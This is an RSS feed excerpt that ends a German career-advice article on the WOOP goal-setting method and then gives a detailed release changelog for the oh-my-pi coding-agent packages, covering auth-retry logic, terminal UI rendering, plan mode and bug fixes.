<li><p><strong>O</strong>utcome (Ergebnis)</p></li>



<li><p><strong>O</strong>bstacle (Hindernis)</p></li>



<li><p><strong>P</strong>lan (Planung)</p></li>
</ul>



<p>Was aber bedeutet das konkret?</p>



<p><strong>1. Wish</strong></p>



<p>Klar, wer etwas erreichen möchte, der sollte sich zunächst ein klares Ziel setzen. Diffuse Vorgaben lassen sich eben deutlich schwerer in die <a href="https://www.computerwoche.de/article/2797131/wie-kindheitstraeume-der-karriereplanung-nutzen.html" title="Realität" target="_blank">Realität</a> umsetzen. Der erste Schritt der WOOP-Strategie besteht also darin, ein möglichst klares Ziel zu formulieren. Das muss übrigens gar keine weltbewegende Angelegenheit sein. Wenn Sie sich vornehmen, fortan zweimal wöchentlich eine halbe Stunde spazieren gehen zu wollen, ist das ein ebenso gutes Ziel, wie das Vorhaben, bis zum nächsten Sommerurlaub die Landessprache halbwegs fließend sprechen zu können.</p>



<p><strong>2. Outcome</strong> </p>



<p>Wie bereits erwähnt, kann es schwierig sein, wenn man sich Ziele zu euphorisch ausmalt. Das soll aber nicht bedeuten, dass es verboten ist zu träumen. Im Gegenteil. Die Psychologin weist darauf hin, dass es durchaus Vorteile hat, sich ein Ergebnis möglichst positiv vorzustellen. Auf diese Weise wird eine offene Grundstimmung erzeugt und das Vorhaben mit einem guten Gefühl angegangen. Sich die Zukunft möglichst rosig auszumalen, kann bei einigen Menschen dazu beitragen, die Dinge entspannter anzupacken. Alles durchaus wünschenswerte Effekte. Die Gefahr liegt aber darin, dass übertriebener Optimismus lähmen kann. Wer es bei dem Schritt belässt, sich seine Zukunft möglichst positiv auszumalen, vergisst häufig den nächsten Schritt – und der ist zentral dafür, wenn wir es zum Beispiel schaffen wollen, unsere Neujahrsvorsätze einzuhalten.</p>



<p><strong>3. Obstacle</strong></p>



<p>Was viele nämlich vergessen, wenn sie sich ihr neues Leben vorstellen, sind die Hindernisse, die noch vor ihnen liegen. Das ist leicht nachzuvollziehen. Schließlich ist es viel schöner, von einer Zukunft zu träumen, in der man im <a href="https://www.computerwoche.de/article/2655533/ueberzeugen-im-vorstellungsgespraech.html" title="Vorstellungsgespräch" target="_blank">Vorstellungsgespräch</a> nicht mehr schwitzen muss, wenn der <a href="https://www.computerwoche.de/article/2819348/10-hr-trends-fuer-arbeitgeber-im-jahr-2023.html" title="Personaler" target="_blank">Personaler</a> auf die Fremdsprachenkenntnisse zu sprechen kommt – und dabei außenvorzulassen, wie viel Zeit für Vokabel- und Grammatiktraining aufgewendet werden müsste. Doch leider gehört genau das dazu. Und an dieser Stelle scheitern viele Vorhaben und Vorsätze.</p>



<p>Wer seine Pläne erfolgreich in die Tat umsetzen möchte, der sollte sich daher vorab möglichst detailliert Klarheit darüber verschaffen, was ihn oder sie davon abhalten könnte. Ein Blick auf bereits gescheiterte Vorhaben kann helfen, die Hindernisse zu finden, die gemeinhin der Grund für das Misslingen sind. Vielleicht entdeckt man beim Blick zurück bestimmte Gewohnheiten oder Glaubenssätze, die hinderlich sind. Einige von uns tragen Glaubenssätze aus <a href="https://www.computerwoche.de/v" title="Kindheit" target="_blank">Kindheit</a> und Jugend mit sich herum, die Hindernisse auf dem Weg zu unserem Ziel sein können. All das gilt es möglichst konkret zu benennen.</p>



<p>Gabriele Oettingen nennt diesen Schritt “<a href="https://www.psy.uni-hamburg.de/arbeitsbereiche/paedagogische-psychologie-und-motivation/personen/oettingen-gabriele/dokumente/krott-marheinecke-oettingen-2019-mentale-kontrastierung-und-woop-foerdern-einsicht-und-veraenderung.pdf" title="mentales Kontrastieren" target="_blank" rel="noopener">mentales Kontrastieren</a>” – und genau das ist zentral dafür, dass wir unsere Pläne erfolgreich umsetzen können. Dieser Erkenntnis liegen die Forschungsergebnisse der Psychologin zugrunde. In ihren Studien stellte sie fest, dass diejenigen Personen am erfolgreichsten ihre Ziele umsetzen konnten, die sich im Vorfeld auch mit den Problemen und Hindernissen beschäftigt haben, die ihnen im Weg stehen. Das Hindernis beziehungsweise die Überwindung des Hindernisses liefert dann nämlich die nötige Energie und Antriebskraft, um das Vorhaben anzugehen und das zu erreichen, was man sich vorgenommen hat.</p>



<p><strong>4. Plan</strong></p>



<p>Man weiß nun, wie die eigene Zukunft aussehen soll und welche Hindernisse im Weg stehen. Damit ist schon einiges erreicht. Damit die WOOP-Strategie funktioniert, fehlt jedoch noch der letzte Schritt. Nämlich ein konkreter Plan, wie man das Hindernis überwinden kann. Dazu kann man sich beispielsweise überlegen, wie es gelingen könnte, alte Gewohnheiten abzulegen und durch neue zu ersetzen, die dazu beitragen, das Ziel zu erreichen.</p>



<p>Zum Beispiel: Statt jeden Morgen beim Warten auf den Zug oder die Straßenbahn gelangweilt durch den <a href="https://www.computerwoche.de/article/2791045/hilfe-mein-chef-folgt-mir-auf-instagram.html" title="Instagram" target="_blank">Instagram</a>-Feed zu scrollen, könnte man die Zeit nutzen, indem man Vokabeln lernt oder sich ein wenig die Grammatik der zu lernenden Fremdsprache ansieht. Glücklicherweise ist auch das alles digital möglich – es gibt also keine Ausrede mehr, warum man beim Warten auf die Bahn, den Zahnarzttermin oder den Kunden nicht daran arbeitet, sein Ziel zu erreichen. (pg)</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.10.1]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Added

Added optional promptCacheKey support to AgentOptions and Agent via a new promptCacheKey property so providers can receive a caller-provided prompt cache key
Added optional ApiKeyResolveContext parameter to getApiKey in AgentOptions and AgentLoopConfig so key resolv...]]></description>
<link>https://tsecurity.de/de/3580230/tools/v15101/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580230/tools/v15101/</guid>
<pubDate>Mon, 08 Jun 2026 02:50:51 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Added</h3>
<ul>
<li>Added optional <code>promptCacheKey</code> support to <code>AgentOptions</code> and <code>Agent</code> via a new <code>promptCacheKey</code> property so providers can receive a caller-provided prompt cache key</li>
<li>Added optional <code>ApiKeyResolveContext</code> parameter to <code>getApiKey</code> in <code>AgentOptions</code> and <code>AgentLoopConfig</code> so key resolvers can receive retry context</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Enabled streaming API calls to re-resolve credentials through the <code>getApiKey</code> callback when retries occur after authentication-related errors</li>
<li><code>Agent.abort(reason?)</code> now forwards <code>reason</code> to the underlying <code>AbortController</code>, and the synthesized aborted assistant message carries that reason on <code>errorMessage</code> (string or non-<code>AbortError</code> <code>Error</code> message) instead of always defaulting to <code>"Request was aborted"</code>. Bare <code>abort()</code> is unchanged.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed handling of short-lived API keys so that expired tokens are retried with a refreshed value during 401/usage-limit failures</li>
<li>Ensured fallback API key resolution uses the initially configured static <code>apiKey</code> when <code>getApiKey</code> is present</li>
<li>Wrapped oneshot LLM completions (<code>instrumentedCompleteSimple</code>: handoff, compaction/branch summaries) in an <code>EventLoopKeepalive</code>. These run outside the agent <code>#runLoop</code>, so without the keepalive Bun's event loop stopped servicing timers while parked on the completion promise — freezing host spinners (e.g. the <code>/handoff</code> loader) until an unrelated terminal resize poked the loop into rendering again.</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the <code>onAuthError</code> option from stream request options and shifted auth retry handling to resolver-based <code>apiKey</code> behavior, requiring callers using custom auth-retry hooks to migrate</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>ApiKeyResolver</code> and <code>ApiKey</code> auth helpers, including <code>isApiKeyResolver</code>, <code>isAuthRetryableError</code>, <code>resolveApiKeyOnce</code>, and <code>withAuth</code>, and exported them from the package root</li>
<li>Added support for a function-valued <code>apiKey</code> in <code>SimpleStreamOptions</code> so a single stream request can refresh or rotate credentials during retry</li>
<li>Added <code>forceRefresh</code> credential option to <code>AuthStorage.getApiKey</code> and <code>rotateSessionCredential</code> support for session-level credential rotation after auth failures</li>
<li>Added <code>AuthStorage.resolver(provider, options)</code> method that builds an <code>ApiKeyResolver</code> implementing the a/b/c auth-retry policy directly on the storage instance</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed gateway and stream auth flows to share the a/b/c retry policy, refreshing the same session credential first and then switching to a sibling credential on repeated auth failures</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed streaming auth retries to handle <code>401</code> and usage-limit errors before replay-unsafe content is emitted, including failures surfaced only via <code>errorStatus</code></li>
<li>Fixed tool argument validation to coerce singleton non-string values into arrays when the schema expects an array, preventing Anthropic-compatible models that emit <code>todo.ops</code> as an object from getting stuck in repeated validation-error loops. (<a href="https://github.com/can1357/oh-my-pi/issues/2026" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2026/hovercard">#2026</a>)</li>
<li>Fixed streaming retries to buffer and suppress partial <code>start</code> events from failed auth attempts so only clean retried events are delivered</li>
<li>Fixed the HTTP 400 raw-request dumper (<code>appendRawHttpRequestDumpFor400</code>) littering the real <code>~/.omp/logs/http-400-requests</code> directory during tests. Provider suites exercise the 400 error path with mocked <code>fetch</code> responses, which the dumper could not distinguish from genuine failures; it now skips persistence under the Bun test runner (<code>isBunTestRuntime()</code>).</li>
<li>Fixed Anthropic Opus requests unnecessarily forcing <code>tool_choice.disable_parallel_tool_use</code>, allowing Claude Opus to use the provider's default parallel tool-calling behavior again.</li>
<li>Fixed parallel <code>function_call</code> items losing arguments against llama.cpp's OpenAI Responses endpoint (<code>/v1/responses</code>), where every call but the last finalized with <code>{}</code> and the agent rejected them with <code>path: Invalid input: expected string, received undefined</code>. llama.cpp's <code>to_json_oaicompat_resp</code> emits <code>output_item.added</code> with only <code>item.call_id</code> (no <code>item.id</code>, no <code>output_index</code>) while the matching <code>function_call_arguments.delta</code> carries <code>item_id: "fc_&lt;call_id&gt;"</code>. <code>processResponsesStream</code> now registers function-call and custom-tool-call items under <code>item.call_id</code> as a secondary lookup key (alongside <code>item.id</code>/<code>output_index</code>) so identifier-deviant hosts route deltas and done events to the right block. (<a href="https://github.com/can1357/oh-my-pi/issues/2015" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2015/hovercard">#2015</a>)</li>
<li>Fixed <code>PI_REQ_DEBUG</code> response recording truncating the captured body when a streamed response was cancelled mid-flight. The response tee in <code>wrapResponse</code> could call <code>FileRequestDebugResponseLog.close()</code> from both the <code>cancel</code> callback and the resumed <code>pull</code> (which observes <code>done</code> once the source reader is cancelled); the second caller saw the handle already nulled and returned before the first caller's pending write flushed, so the <code>.res.log</code> lost the already-buffered chunk. <code>close()</code> now memoizes its flush-and-close promise so every caller awaits the same completion.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added <code>display.smoothStreaming</code> setting (default <code>true</code>) to let users enable or disable smooth assistant-stream text reveal</li>
<li>Added <code>/tan &lt;work&gt;</code> slash command to fork the current conversation into a background agent so tangential work can continue asynchronously while your main session stays active</li>
<li>Added a background <code>/tan</code> dispatch message that records the handoff in the transcript and marks the delegated work as non-blocking</li>
<li>Added <code>providerPromptCacheKey</code> support to <code>CreateAgentSessionOptions</code> so <code>/tan</code> background sessions can reuse the parent session’s prompt-cache lineage</li>
<li>Added session cloning for <code>/tan</code> runs with copied artifacts and shared MCP proxy tools</li>
<li>Added <code>SessionManager.forkFrom</code>’s optional <code>suppressBreadcrumb</code> mode to avoid breadcrumb updates when forking background <code>/tan</code> sessions</li>
<li>Added OSC 5522 enhanced paste handling in <code>InputController</code>, so terminal clipboard events are decoded as image or text payloads and inserted without passing raw paste sequences to the editor</li>
<li>Added bracketed image-path paste support in <code>CustomEditor</code> so a single pasted image file path (PNG/JPEG/GIF/WEBP) is loaded from disk and inserted as an image candidate</li>
<li>Added direct support for <code>Image #N</code> insertion from pasted local image paths by routing successful image-path pastes through the same image normalization and resize flow as clipboard image pastes</li>
<li>Added <code>/fresh</code> to rotate the provider-facing session id and clear in-memory provider stream/cache state without changing the local session file.</li>
<li>Added a <code>ChatBlock</code> transcript primitive (<code>modes/components/chat-block.ts</code>) and a single <code>ctx.present(...)</code> sink (with <code>ctx.resetTranscript()</code>) so chat output is mounted in one place instead of the repeated <code>chatContainer.addChild(...)</code> + <code>ui.requestRender()</code> pattern scattered across controllers. <code>ChatBlock</code> carries a React/Svelte-style lifecycle — <code>onMount</code> starts effects, <code>onCleanup</code> registers teardown, <code>finish()</code> self-completes (stops timers and freezes the block at its final content), and <code>dispose()</code>/<code>resetTranscript()</code> tears everything down — so animated blocks own their own resources instead of leaking <code>setInterval</code>/<code>requestRender</code> bookkeeping into callers. The MCP "Connecting…" spinner is now such a block.</li>
<li>Added a <code>framedBlock</code> output-block helper (<code>tui/output-block.ts</code>) plus a <code>borderColor</code> override and <code>applyBg: false</code> (no background fill) on output blocks, a <code>renderStatusLine</code> <code>iconOverride</code>, and an <code>icon.search</code> (magnifier) theme symbol — so tool renderers can draw self-contained muted-outline frames and search-family tools can show a magnifier instead of a checkmark.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>
<p>Changed the bash tool frame to use a plain top rule instead of repeating "Bash" in the title bar, and folded minimizer raw-output artifact links into the status footer as <code>Artifact: &lt;id&gt;</code>.</p>
</li>
<li>
<p>Changed grouped <code>read</code> output to use a white filled-circle mark for the group/single-read success state and omit duplicate per-file success marks inside multi-read groups.</p>
</li>
<li>
<p>Changed assistant streaming output to reveal text incrementally at 30 FPS with grapheme-safe adaptive catch-up, instead of replacing the whole message chunk-by-chunk</p>
</li>
<li>
<p>Changed shimmer-driven TUI animations (working text, pending bash/eval borders, and theme activity-spinner documentation) to render at 30fps instead of 60fps.</p>
</li>
<li>
<p>Changed running <code>task</code> tool agent rows to use a static <code>•</code> marker and shimmer only the subagent name, leaving descriptions, stats, and nested tool detail text solid while removing the rotating status glyph from those rows.</p>
</li>
<li>
<p>Changed settings singleton method access to reuse bound methods for the active instance instead of allocating a new bound function on every <code>settings.get</code> lookup.</p>
</li>
<li>
<p>Changed plan-mode approval to keep the drafted <code>local://&lt;slug&gt;-plan.md</code> file at its original name as the canonical plan path, so approved plans are no longer renamed when leaving plan mode</p>
</li>
<li>
<p>Changed plan-mode write enforcement so only <code>local://</code> artifact files are writable during planning, blocking working-tree edits and allowing scratch or draft plan files in the local artifact area</p>
</li>
<li>
<p>Changed the <code>todo</code> tool result renderer to stop redrawing every phase's full task list on each update: when a multi-phase list is rendered collapsed (the default, not manually expanded), only phases the latest update touched — the phase holding the in_progress task, any phase with a just-completed task, and phases named by the ops that ran (<code>init</code> counts as touching all) — render their tasks; untouched phases collapse to a one-line <code>N. Name  done/total</code> summary. When call args are unavailable (e.g. transcript rebuilds) it falls back to the in_progress/completed-transition signals, and the manual expand toggle still shows every task. Also dropped the blank separator line previously inserted between phases.</p>
</li>
<li>
<p>Changed non-agent API operations (title and commit-message generation, image generation, web search, eval <code>llm()</code>, auto-thinking classifier, memory consolidation) to use session-aware API key resolution with auth retries via <code>registry.resolver()</code> / <code>authStorage.resolver()</code>, refreshing the active credential before rotating to another account</p>
</li>
<li>
<p>Changed image generation to wrap every provider fetch branch in <code>withAuth</code>, so 401 / usage-limit errors trigger credential force-refresh and rotation for authStorage-backed providers (OpenAI-hosted, antigravity, xai-oauth) while env-only providers (openrouter, gemini) stay single-attempt</p>
</li>
<li>
<p>Changed web-search providers using <code>authStorage.getApiKey</code> (anthropic, exa, tavily, parallel, synthetic, zai, kimi) to wrap HTTP calls in <code>withAuth</code> for automatic credential rotation on 401 / usage-limit errors</p>
</li>
<li>
<p>Changed the directory grouping for <code>find</code>, <code>search</code>, <code>ast_grep</code>, <code>ast_edit</code>, and <code>lsp</code> diagnostics from a single flat <code># dir/</code> heading per immediate directory to a multi-level tree that folds the common path prefix into one heading. Previously every group repeated the full directory path — so results rooted outside cwd printed the absolute prefix (e.g. <code>/Users/me/proj/</code>) on every heading and nested directories were never collapsed. Now a single-child directory chain folds into one heading (<code># packages/pkg/src/</code>, including an absolute root for out-of-cwd results), subdirectories nest one <code>#</code> deeper (<code>## nested/</code> → <code>### child.ts</code>), and each directory's own files are listed before its subdirectories. TUI hyperlink reconstruction tracks the nested directory stack across the whole output so file and code-frame links keep resolving to the correct absolute paths.</p>
</li>
<li>
<p>Changed the plan-mode approval surface from an inline transcript block plus a separate bottom selector into a single fullscreen overlay (like <code>/copy</code>) and overhauled its navigation. The overlay now renders the plan per-section through <code>ScrollView</code> (line-level ↑/↓ scroll, Shift+↑/↓ to scroll faster, PgUp/PgDn, g/G) with no stray per-line <code>…</code>, and — when the terminal is wide enough and the plan has ≥2 headings — shows a compact VS Code-style section sidebar (the redundant plan-title heading and any "Contents" label are omitted). Focus moves between regions with Tab/Shift+Tab (and flows at the edges: Down past the last section or the bottom of the body drops into the approval options; Up steps back), while the sidebar glows to track the scrolled section. The sidebar can fast-jump between sections, delete a section (with <code>u</code> undo), and annotate sections with feedback (<code>a</code>); deletions and annotations are collected into refinement feedback that is submitted back to the model when the operator picks "Refine plan". Mouse works too: clicking an approval option activates it, clicking a sidebar section jumps to it, and the wheel scrolls the plan. ←/→ always drive the model-tier slider, Enter confirms, the external-editor key opens the plan, and Esc cancels. The overlay borrows the terminal's alternate screen buffer for its lifetime (<code>fullscreen</code> overlay), so the transcript stays put on the normal screen instead of bleeding through scrollback behind the modal.</p>
</li>
<li>
<p>Changed the interactive controllers (command, MCP, selector, extension-UI, event), debug panels, and the status/error/warning helpers to render chat output through <code>ctx.present(...)</code> instead of appending to <code>chatContainer</code> and calling <code>ui.requestRender()</code> directly; transcript rebuilds dispose live blocks via <code>ctx.resetTranscript()</code> so animated blocks' timers stop on reset.</p>
</li>
<li>
<p>Changed tool-execution block rendering so the container (<code>ToolExecutionComponent</code>) is a transparent passthrough — it no longer inserts a top/bottom blank line, adds left/right padding, or paints a state-colored background behind tool output. Tools with substantial body now self-frame with a muted outline and the tool title in the frame's top bar (<code>edit</code>/<code>apply_patch</code>, <code>write</code>, <code>ask</code>, <code>todo</code>, <code>github</code>, <code>goal</code>, <code>inspect_image</code>, <code>search_tool_bm25</code>, <code>task</code>), matching the already-framed <code>bash</code>/<code>read</code>/<code>eval</code>/<code>debug</code>/<code>web_search</code>/<code>lsp</code> blocks, while streaming/in-progress and trivial results collapse to a clean status line. The search-family list tools (<code>find</code>, <code>search</code>, <code>ast_grep</code>) and <code>job</code> render frameless/minimal; <code>find</code>/<code>search</code>/<code>ast_grep</code> show a magnifier on success instead of a checkmark, and <code>job</code> drops its <code>Job:</code> label prefix (the per-job rows are self-describing). The <code>search_tool_bm25</code>, <code>github</code>, and <code>inspect_image</code> frames draw with no background fill, and <code>inspect_image</code>'s label was shortened to <code>Inspect</code>.</p>
</li>
<li>
<p>Changed the plan-mode active prompt (<code>prompts/system/plan-mode-active.md</code>) to make plans decision-complete and cut filler. Added an Objective framing ("another engineer can execute end-to-end without making a single design decision"), a shared "Resolving Unknowns" section (explore discoverable facts before asking; reserve <code>ask</code> for non-derivable preferences/tradeoffs with 2–4 options + a recommended default), and a single shared "The Plan" structure (Context / Approach grouped by behavior not file-by-file / ≤5 Critical files / Verification / Assumptions) that replaces the per-branch structure guidance previously duplicated across the iterative and parallel workflows. Added explicit prohibitions on sections that decide nothing (Non-Goals, Out of Scope, Alternatives Considered, Risks/Mitigations boilerplate, Future Work), on enumerating every file/line, and on inventing schema/validation/precedence policy the request never established.</p>
</li>
<li>
<p>Changed completion notifications (<code>completion.notify</code>) to fire whenever the agent yields its turn, including in the foreground. The <code>agent_end</code> notification was previously gated behind background mode (<code>isBackgrounded</code>), so an ordinary foreground turn never emitted one; the gate is gone and the desktop toast now fires on every normal turn completion (still skipped for aborted/error turns and when <code>completion.notify</code> is <code>off</code>).</p>
</li>
<li>
<p>Changed the in-progress <code>task</code> tool block to keep the shared <code>context</code> brief (<code># Goal</code> / <code># Constraints</code> background) visible after the first progress snapshot arrives, instead of dropping it the moment the streaming call view was replaced by the result frame, and to stop animating a spinner/clock next to the <code>Task</code> frame header while running — the per-agent body lines already carry their own running spinner, so the header now shows a static state icon (matching the completed/failed header icons). The context is rendered through a shared <code>buildContextSection</code> helper that also undoes per-field double-encoding, so the brief reads cleanly in the result frame even though <code>renderResult</code> receives the raw (un-repaired) tool args.</p>
</li>
<li>
<p>Changed the messaging shown when you press Esc to interrupt a streaming turn from the ambiguous <code>Operation aborted</code> / <code>Tool execution was aborted: Request was aborted</code> to <code>Interrupted by user</code>, so a deliberate user interrupt no longer reads like an internal failure. Every Esc/flush interrupt path (<code>onEscape</code> while streaming, the queued-message restore-and-abort path, and the empty-submit queue flush) threads the reason through <code>AgentSession.abort({ reason })</code> → <code>Agent.abort(reason)</code> so it rides the <code>AbortController</code> onto the aborted assistant message's <code>errorMessage</code>; the turn label renders it verbatim on both the live and replay paths, and the synthetic placeholder results paired with in-flight tool calls now read <code>Tool execution was aborted: Interrupted by user</code>. Aborts that carry no reason still fall back to the retry-aware <code>Operation aborted</code> generic. Transcript label resolution is centralized in <code>resolveAbortLabel</code> (<code>session/messages.ts</code>).</p>
</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the <code>/background</code> (and <code>/bg</code>) slash command and the background-mode subsystem it was the sole entry point for — <code>InteractiveMode.isBackgrounded</code>, <code>createBackgroundUiContext</code>, <code>handleBackgroundEvent</code>, and every <code>isBackgrounded</code> guard across the input/event/extension-UI controllers and UI helpers. The command suspended the whole process group via <code>SIGTSTP</code> (a leftover testing shortcut) instead of detaching the running agent, which is not the expected workflow — use terminal panes or a multiplexer instead.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed inline <code>find</code> and <code>search</code> result blocks to align with grouped <code>read</code> output and render their success headers with the normal tool-title color instead of accent blue.</p>
</li>
<li>
<p>Fixed the working-status shimmer to opt into the loader's 30fps animated-message repaint path while keeping both the status spinner and pending bash/eval tool spinners on their normal 80 ms glyph cadence.</p>
</li>
<li>
<p>Fixed consecutive <code>read</code> tool calls failing to collapse into a single grouped block when a reasoning model emits one read per completion (<code>[thinking, read]</code>). The read group was reset on every assistant <code>message_start</code>, so each read rendered as its own one-entry <code>Read …</code> line; now a read run accretes across completions and is broken only by a rendered non-empty text/thinking block, a non-read tool, or a user/IRC message — matching the transcript-rebuild path. <code>ReadToolGroupComponent</code> now reports its live/finalized state so the growing <code>Read (N)</code> header repaints correctly on native-scrollback (risk) terminals.</p>
</li>
<li>
<p>Fixed the <code>task</code> tool shared-context brief rendering raw Markdown headings (<code># Goal</code>, <code># Constraints</code>) inside framed call/result blocks instead of using the normal Markdown renderer.</p>
</li>
<li>
<p>Fixed the animated pending border on <code>bash</code>/<code>eval</code> blocks leaving a frozen dark "bar" segment behind after a backgrounded command finalized through the async update path. Once a command is auto-backgrounded (<code>details.async.state === "running"</code>) the block stays "partial" in the TUI until the async job-manager delivers the final result, but it also gets committed to native scrollback — so a mid-sweep shimmer frame baked a stray darkened border segment into the committed copy. The border now stops animating (and the 60fps redraw loop stops) the moment a block enters the backgrounded state, so the committed frame is a clean static border.</p>
</li>
<li>
<p>Fixed cold <code>omp</code> launch to clear native terminal history on the first paint, avoiding a once-per-launch duplicate welcome/transcript copy before the normal session replay.</p>
</li>
<li>
<p>Fixed plan approval resolution so <code>resolve</code> with <code>action: "apply"</code> can still find the plan file when <code>extra.title</code> is missing or stale by falling back to the current plan path and most-recent local plan artifacts</p>
</li>
<li>
<p>Fixed the search-family tool magnifier glyph (<code>find</code>, <code>search</code>, <code>ast_grep</code>, <code>search_tool_bm25</code>) to use the <code>accent</code> title color instead of <code>success</code> green, so the icon matches the tool title in the status header instead of standing out</p>
</li>
<li>
<p>Fixed TTSR stream interrupts to pass the matched rule name through the abort reason, so aborted in-flight tool placeholders say why they were stopped instead of <code>Request was aborted</code>.</p>
</li>
<li>
<p>Fixed URL reads for binary/special payloads to reuse local readers: remote archives list their root entries, SQLite databases show their table overview, notebooks render as editable cells, and unrenderable binary returns a metadata notice instead of decoded byte garbage.</p>
</li>
<li>
<p>Fixed pasted image-file paths that cannot be loaded to fall back to normal text paste with status feedback instead of disappearing.</p>
</li>
<li>
<p>Fixed tool-output file paths not being clickable OSC 8 <code>file://</code> hyperlinks in several renderers. <code>read</code> titles for plain text and image files (the common case) emitted no link at all because the renderer only linked when a <code>resolvedPath</code> was recorded — which the ordinary file/image read paths never set, keeping the absolute path only in <code>meta.source</code>; the renderer now falls back to that source path. <code>write</code> headers were never wrapped in a hyperlink and now link to the absolute path written (file, archive entry, SQLite, and conflict resolutions). <code>edit</code>/<code>apply_patch</code> headers wrapped the model-supplied (often cwd-relative) argument path, producing a root-anchored <code>file:///rel/path</code> URI; they now link the absolute <code>details.path</code> instead. Finally, <code>search</code>, <code>ast_grep</code>, and <code>ast_edit</code> produced doubled link targets (<code>/proj/src/src/file.ts</code>) for searches scoped to a subdirectory, because the renderer resolved the cwd-relative display paths against the scope directory rather than cwd — the scoped-search base is now the session cwd (with the scoped file's absolute path still seeding single-file body lines).</p>
</li>
<li>
<p>Fixed <code>omp dry-balance --bench</code> to recover from 401 token failures by re-minting the failing OAuth credential in place before switching accounts</p>
</li>
<li>
<p>Fixed the bash tool corrupting commands that embed multi-byte UTF-8 (e.g. <code>✓</code>/<code>×</code> inside a <code>grep -E</code> pattern) ahead of a trailing <code>| head</code>/<code>| tail</code>. The <code>bash.stripTrailingHeadTail</code> rewrite cut at char-offset positions reported by <code>brush-parser</code> while slicing the command by byte offset, so the trailing-pipe strip landed mid-pattern and dropped the closing quote — turning <code>… |✓|×|XCTAssert" | tail -80</code> into <code>… |✓|×-80</code> and making execution fail with <code>pi-natives:command: unterminated double quote</code>. Fixed in <code>pi_shell::fixup</code> (<code>@oh-my-pi/pi-natives</code>).</p>
</li>
<li>
<p>Fixed <code>omp dry-balance --bench</code> to recover from 401 token failures by re-minting the failing OAuth credential in place before switching accounts</p>
</li>
<li>
<p>Fixed duplicate file entries in grouped outputs for <code>find</code>, <code>search</code>, <code>ast_grep</code>, <code>ast_edit</code>, and <code>lsp</code> diagnostics when the same path appeared multiple times</p>
</li>
<li>
<p>Fixed search, grep, and edit output rendering so repeated directory group blank-line boundaries no longer break nested path/link reconstruction</p>
</li>
<li>
<p>Fixed <code>omp dry-balance --bench</code> flooding the terminal with staircased, duplicated spinner/status lines (and an indented summary) when the tty has ONLCR/OPOST disabled (raw mode). The interactive progress region separated rows with a bare LF and repositioned with a column-preserving <code>\x1b[&lt;n&gt;A</code> cursor-up, both of which only land at column 0 when the terminal translates LF→CRLF; with that translation off, every 80 ms redraw cascaded down and to the right into scrollback. The live region now carriage-returns before every cleared row, terminates each row with CRLF, and caps each row to the terminal width so a wrapped line cannot desync the cursor-up from the logical line count.</p>
</li>
<li>
<p>Fixed inconsistent vertical spacing between transcript blocks: some blocks (tool results from <code>search</code>/<code>find</code> and other renderer-backed tools) rendered with a doubled gap (a leading <code>Spacer</code> plus the content box's own <code>paddingY</code>), while others (the grouped <code>read</code> card, file-mention lists, IRC cards) rendered with no gap at all. Vertical spacing is now owned entirely by the chat renderer: <code>TranscriptContainer</code> strips each block's plain-blank top/bottom edges and inserts exactly one blank line between consecutive blocks, so every block is separated by a single consistent gap regardless of which component produced it. Individual components (assistant/user/tool/read-group/bash/eval/skill/custom/hook/compaction/branch/todo-reminder/plan-review messages) no longer emit their own leading <code>Spacer</code>/<code>paddingY</code> for separation, and multi-row groups (IRC cards, file-mention lists, completed-job batches, and the bordered command/<code>/changelog</code>/<code>/context</code>/version/OAuth/debug panels) are wrapped as single <code>TranscriptBlock</code> children so the renderer spaces them as one unit. Background-colored box padding is preserved as block-internal design.</p>
</li>
<li>
<p>Fixed <code>resolve</code> with <code>action: "discard"</code> surfacing a hard <code>isError</code> "No pending action to resolve" failure to the model when the agent asked to cancel a staged action (e.g. an <code>ast_edit</code> preview) but nothing was pending. A discard is a request to reach the "no staged change" end-state, which already holds in that case, so it is now honored as a successful cancellation (<code>"Nothing to discard; no pending action remains."</code> with <code>details.action: "discard"</code>) instead of an error. <code>action: "apply"</code> with no pending action still errors.</p>
</li>
<li>
<p>Fixed the collapsed tool-output expand hint rendering double brackets (e.g. <code>((Ctrl+O for more))</code>) — the <code>EXPAND_HINT</code> text already carried its own parentheses and then <code>formatExpandHint</code> wrapped it again with the theme's bracket glyphs. The hint now resolves the key actually bound to <code>app.tools.expand</code> at render time and reads <code>⟨&lt;key&gt;: Expand⟩</code> (e.g. <code>⟨Ctrl+O: Expand⟩</code>), so a single bracket pair surrounds it and a user remap of the expand keybinding is reflected instead of a hard-coded <code>Ctrl+O</code>.</p>
</li>
<li>
<p>Fixed the <code>edit</code>/<code>apply_patch</code> tool dropping its outlined frame while streaming/in-progress (only the final result was framed); the in-progress diff preview now renders inside the same muted frame as the completed result.</p>
</li>
<li>
<p>Fixed the <code>todo</code> and <code>job</code> tools rendering a success icon and success styling on a failed/error result; error results now show the error icon and a red frame border.</p>
</li>
<li>
